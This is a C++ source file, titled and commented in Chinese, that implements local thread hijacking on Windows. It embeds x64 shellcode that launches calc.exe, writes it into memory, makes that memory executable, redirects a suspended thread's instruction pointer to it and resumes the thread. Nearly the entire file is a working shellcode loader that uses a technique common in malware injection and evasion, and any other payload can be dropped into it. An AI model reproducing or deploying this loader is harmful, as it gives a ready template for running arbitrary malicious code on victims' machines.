本地线程劫持的 C++ 实现

#include <windows.h>
#include <iostream>

// 示例：弹出计算器的Shellcode（Windows x64）
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main() {
    DWORD shellcode_len = sizeof(buf);

    // 1. 创建一个被挂起的线程（入口函数可以是任意函数，这里用MessageBox）
    HANDLE hThread = CreateThread(
        NULL,                    // 安全属性
        0,                       // 栈大小
        (LPTHREAD_START_ROUTINE)MessageBoxW, // 入口函数（实际不会执行）
        NULL,                    // 参数
        CREATE_SUSPENDED,        // 创建后挂起
        NULL                     // 线程ID
    );

    if (hThread == NULL) {
        std::cerr << "[-] CreateThread failed: " << GetLastError() << std::endl;
        return -1;
    }

    std::cout << "[+] Suspended thread created: " << hThread << std::endl;

    // 2. 分配可执行内存并写入Shellcode
    LPVOID pShellcode = VirtualAlloc(
        NULL,
        shellcode_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE
    );

    if (pShellcode == NULL) {
        std::cerr << "[-] VirtualAlloc failed: " << GetLastError() << std::endl;
        CloseHandle(hThread);
        return -1;
    }

    memcpy(pShellcode, buf, shellcode_len);

    // 3. 修改内存权限为可执行
    DWORD oldProtect;
    if (!VirtualProtect(pShellcode, shellcode_len, PAGE_EXECUTE_READ, &oldProtect)) {
        std::cerr << "[-] VirtualProtect failed: " << GetLastError() << std::endl;
        VirtualFree(pShellcode, 0, MEM_RELEASE);
        CloseHandle(hThread);
        return -1;
    }

    // 4. 获取线程上下文
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_FULL;

    if (!GetThreadContext(hThread, &ctx)) {
        std::cerr << "[-] GetThreadContext failed: " << GetLastError() << std::endl;
        VirtualFree(pShellcode, 0, MEM_RELEASE);
        CloseHandle(hThread);
        return -1;
    }

    // 5. 修改RIP（64位）或 EIP（32位）指向Shellcode
#ifdef _WIN64
    ctx.Rip = (DWORD64)pShellcode;
#else
    ctx.Eip = (DWORD)pShellcode;
#endif

    // 6. 设置修改后的上下文
    if (!SetThreadContext(hThread, &ctx)) {
        std::cerr << "[-] SetThreadContext failed: " << GetLastError() << std::endl;
        VirtualFree(pShellcode, 0, MEM_RELEASE);
        CloseHandle(hThread);
        return -1;
    }

    std::cout << "[+] Thread context modified, RIP -> " << pShellcode << std::endl;

    // 7. 恢复线程执行，开始执行Shellcode
    if (ResumeThread(hThread) == -1) {
        std::cerr << "[-] ResumeThread failed: " << GetLastError() << std::endl;
        VirtualFree(pShellcode, 0, MEM_RELEASE);
        CloseHandle(hThread);
        return -1;
    }

    std::cout << "[+] Thread resumed. Shellcode should be executing..." << std::endl;

    // 等待线程结束（可选）
    WaitForSingleObject(hThread, INFINITE);

    // 清理资源
    VirtualFree(pShellcode, 0, MEM_RELEASE);
    CloseHandle(hThread);

    return 0;
}